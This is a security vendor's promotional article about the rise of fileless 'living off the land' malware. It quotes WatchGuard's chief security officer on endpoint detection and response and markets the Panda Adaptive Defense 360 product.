Defending Against Fileless Malware with Panda Adaptive Defense 360
According to WatchGuard’s Q4 2020 Internet Security Insights Report, fileless malware attacks rose 888% in 2020 over the prior year. The data is quantifiable and based on a year’s worth of endpoint threat intelligence collected from WatchGuard Panda products. Fileless malware, also known as “living off the land” malware, are threats that don’t enter a network through a traditional file. This means the malware is never written to disk and generally remains unnoticed by anti-virus scans. If the malware is never written to disk, it resides only in memory and successful endpoint protection must analyze the processes as they are executed. The ability to analyze processes as they are executed is a component of advanced endpoint protection known as Endpoint Detection and Response (EDR). In a recent interview Corey Nachreiner, the Chief Security Officer at WatchGuard technologies, explains the benefits of EDR in fending off fileless attacks.
Most antivirus or endpoint protection (EPP) is all about preventing malware. Pre-execution catching the malware before it even has a chance to do anything bad, and you absolutely want that type of protection. But the truth is because of evasive attacks. There are some malware instances that will actually run, and that’s where EDR or endpoint detection and response comes in. It’s not necessarily looking just at files. It’s looking at the processes that are running. It’s looking at tricky, very technical things like what what’s being injected in other processes, running on your computer. It looks at some of the scripts being run and long story short, it’s better capable of catching these finalists attacks. So again, huge rise in 2020, but the takeaway for your audience is to consider things like EDR, make sure your endpoint protection suite includes this post execution and fileless detection capability, where it has a better chance of catching these sorts of attacks.
Fileless malware can also be referred to as “living off the land” (LOTL) because the attacks can’t bring many resources or tools with them and remain undetected. They must instead look within the network to find existing tools they can use for the attack. Using native tools already present on the system to accomplish the attack objectives allows LOTL attacks to go unnoticed by antivirus. Often the attackers can reside on a system for weeks or months without being detected as they exfiltrate and destroy data or operations. Some of the most common native tools used in LOTL attacks are Windows PowerShell, the command-line tool WMI, and the credential-dumping tool Mimikatz. Monitoring these otherwise benign tools as they execute malicious commands is the only way to stop a LOTL attack.
The trend in these types of advanced campaigns is that attackers are becoming far more selective in their choice of victim. Once they identify a target with a high probability to pay a larger ransom, they are willing to spend more time and employ more advanced techniques such as spear-phishing or LOTL in order to execute the attack. As Corey Nachreiner points out, if your data is critical and you have the ability to pay quickly, you could be a target.
It could be a healthcare provider or hospital that needs patient records. It could be manufacturing firm where every hour down causes issues. It could be governments or really any company that really needs its data critically for whatever it’s doing. They even have been known for targeting cyber insurance companies because if they can find people that are insured, they have an idea that these are people that might pay the ransom.
— Corey Nachreiner
In order to fill the gap between traditional anti-virus and fileless attacks, security solutions must combine Endpoint Protection Platform (EPP) and Endpoint Detection & Response (EDR) capabilities. WatchGuard’s flagship solution, Panda Adaptive Defense 360 combines EPP, EDR and also provides a Zero-Trust Application Service through 100% classification of all applications, programs, and executables. Panda Adaptive Defense 360 also includes a Threat Hunting Service which detects the anomalous usage of trusted applications on endpoints. In both third-party testing and the years of experience gained through customer deployments, the effectiveness of the Adaptive Defense solution in combating all types of known, unknown, and zero-day threats, in-memory attacks, and even fileless attacks has been proven repeatedly.